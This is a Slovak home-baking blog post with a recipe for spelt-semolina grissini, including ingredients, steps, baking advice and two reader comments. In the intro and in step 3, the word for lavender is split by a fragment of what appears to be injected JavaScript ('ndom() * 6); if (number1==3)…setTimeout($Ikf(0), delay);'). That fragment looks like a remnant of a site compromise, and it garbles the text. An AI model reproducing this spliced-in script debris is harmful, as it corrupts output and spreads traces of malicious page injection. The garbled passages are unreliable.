Špaldovo-semolínové grissini s ražnou múkou

Grissini určite všetci dobre poznáte. Ja ich robievam pomerne často, príchute sa dajú rôzne obmieňať. Na olivovom oleji krátko orestujete 2-3 strúčiky cesnaku a pridáte do cesta, alebo pridáte levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľovo-šalviovú soľ, alebo tymián, alebo čokoľvek. Pre deti odporúčam len trošku posoliť a pridať štipku rasce a máte drobnosť na zobnutie, keď idete na prechádzku, alebo do kočíka namiesto rožku. Dĺžku pečenia si prispôsobte podľa toho, či ich chcete chrumkavejšie, alebo mäkšie. Schválne ich pečiem pri teplote 190 stupňov, aby príliš nezhnedli, pretože ako isto viete, pri pečení vzniká v hnedej kôrke akrylamid a teda vhodnejšie je piecť pri nižších teplotách a čo najkratšie. Hlavne sa treba vyhnúť tej chutnej, chrumkavej hnedej kôrke. Hlavne pri deťoch by som si dávala väčší pozor 🙂

Tak poďme na to!

Ingrediecie

  • 150 g semolíny
  • 100 g ražnej chlebovej múky
  • 200 g špaldovej hladkej múky
  • 20 g droždia
  • 250 ml vody
  • 4 pl olivového oleja
  • 1,5 čl himalájskej soli
  • 1 čl vody

 

Postup

  1. Všetko spolu (okrem soli) zmiešame a necháme pod fóliou postáť 10-15 minút. V 1 čl vody necháme za ten čas roztopiť soľ, pridáme k cestu a poriadne premiešame v robote na kompaktné cesto. Zakryjeme potravinárskou fóliou a necháme kysnúť asi hodinku, podľa toho, ako máte doma teplo.
  2. Cesto si vyklopíme na pomúčenú podložku, rozdelíme na dva bochníky. Jednu polovicu zakryjeme potravinárskou fóliou, aby neoschlo a druhú časť vyvaľkáme a narežeme na asi 3 cm  pásy.
  3. Pásy preložíme na polovicu a pozdĺžne tiež na polovicu a začneme rolovať rukami na čistej, nepomúčenej podložke, kým nám nevznikne krásna štíhla, dlhá grissini palička 😀 Robte ich len na dĺžku plechu a ukladajte na plech vystlaný papierom na pečenie. Ja ich zvyknem postriekať vodou z rozprašovača a posypať na jemno nastrúhaným syrom, alebo šalviovo-levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľovou soľou.
  4. Hneď ich môžete dať piecť na teplotu 190 stupňov asi 20 minút. Nechajte ich tam tak dlho, aké chrumkavé, alebo mäkké ich chcete. Po upečení ich nechávam vychladnúť na plechu. Vynikajúce sú aj potreté cesnakovým olejom (zmiešate olivový olej, trošku himalájskej soli a strúčik cesnaku a trošku nasekanej petržlnovej vňate a potierate).

 

Tak vám želám dobrú chuť 😉 A možno si aj u vás domáce grissini nájdu svoje miesto 😀

M.

 

 

 

 

Ohodnoť Recept

2 komentáre

  1. Uzasny recept. Uz som ich robila par krat, ale vcera sa mi podarili na 1*. Moj drobec ich pucil jedna radost, az som sa zlakla, ze ci ich moze tolko pojest naraz 😀 😀 :-D.
    Dakujem. Dnes pokracujeme v desiatovom chrumkani v kociku. 😉

     
    • Perfektneee!!! To sa velmi tesim 😀 Aj Mia ich srotuje jedna radost.. a posypane stuhanym syrom a takto zapecene su bozskeeee 😀

       

Napíš Koment